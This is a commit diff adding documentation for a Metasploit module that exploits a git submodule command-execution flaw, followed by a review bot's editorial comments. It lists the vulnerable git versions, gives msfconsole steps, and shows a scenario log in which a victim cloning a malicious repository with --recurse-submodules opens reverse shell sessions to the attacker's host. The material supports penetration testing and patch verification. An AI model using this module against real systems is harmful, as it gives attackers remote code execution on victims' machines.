Commit 5631ddc

add docs for the git submodule vulnerability
1 parent 39299c0 commit 5631ddc

Lines changed: 62 additions & 0 deletions
@@ -0,0 +1,62 @@
1+
## Vulnerable Application
2+
3+
Git can be installed on a variety of operating systems, however
4+
newer versions may contain the patch for this vulnerability.
5+
6+
On OSX it can be installed with the XCode command line tools:
7+
```xcode-select --install```
8+
9+
On Linux it can be installed with apt:
10+
```sudo apt-get update && sudo apt-get install git```
11+
12+
You can check the version with ```git --version```.
13+
The fix is included in the following version:
14+
2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
15+
16+
## Verification Steps
17+
18+
Example steps in this format:
19+
20+
1. Install the application
21+
1. Start msfconsole
22+
1. Do: ```use exploit/multi/http/git_submodule_command_exec```
23+
1. Do: ```set SRVHOST [local host]```
24+
1. Do: ```set LHOST [local host]```
25+
1. Do: ```exploit```
26+
1. Clone the malicous Git URI and its submodules
27+
1. You should get a shell
28+
29+
## Options
30+
31+
**GIT_URI**
32+
33+
This is the URI the git repository will be hosted from (defaults to random).
34+
35+
**GIT_SUBMODULE**
36+
37+
This is the URI of the submodule within the git repository (defaults to random).
38+
The url of this submodule, when cloned, will execute the payload.
39+
40+
## Scenarios
41+
42+
Example usage against a macOS Sierra x64 bit target running git version 2.10.1
43+
44+
```
45+
msf > use exploit/multi/http/git_submodule_command_exec
46+
msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
47+
SRVHOST => 192.168.0.1
48+
msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
49+
LHOST => 192.168.0.1
50+
msf exploit(git_submodule_command_exec) > exploit
51+
[*] Exploit running as background job.
52+
53+
[*] Started reverse TCP handler on 192.168.0.1:4444
54+
msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
55+
[*] Server started.
56+
[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
57+
***
58+
Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
59+
***
60+
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
61+
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800
62+
```
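Review bot: The "Vulnerable Application" section (new lines 3-14) tells the reader to install git with `xcode-select --install` or `apt-get install git`, while also noting that newer versions may contain the patch. Someone following these steps may therefore end up with a build the module cannot be verified against. Please say explicitly that a release older than the listed fixed versions is needed for the corresponding series, and change "The fix is included in the following version:" to "versions", since eight releases are listed. Under "Verification Steps", new line 18 still carries the template sentence "Example steps in this format:", which should be dropped, and new line 26 has the typo "malicous". Step 26 would also be clearer if it showed the clone command used in the scenario (`git clone ... --recurse-submodules`), because cloning without that flag is not what the scenario demonstrates. The scenario output shows two command shell sessions opening from one clone; a sentence explaining whether that is expected would help anyone comparing their own run against it. Style: inline commands are wrapped in triple backticks throughout, where single backticks are enough. It would also help defenders if the doc named the advisory or identifier this module corresponds to, so the fixed-version list can be cross-checked.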
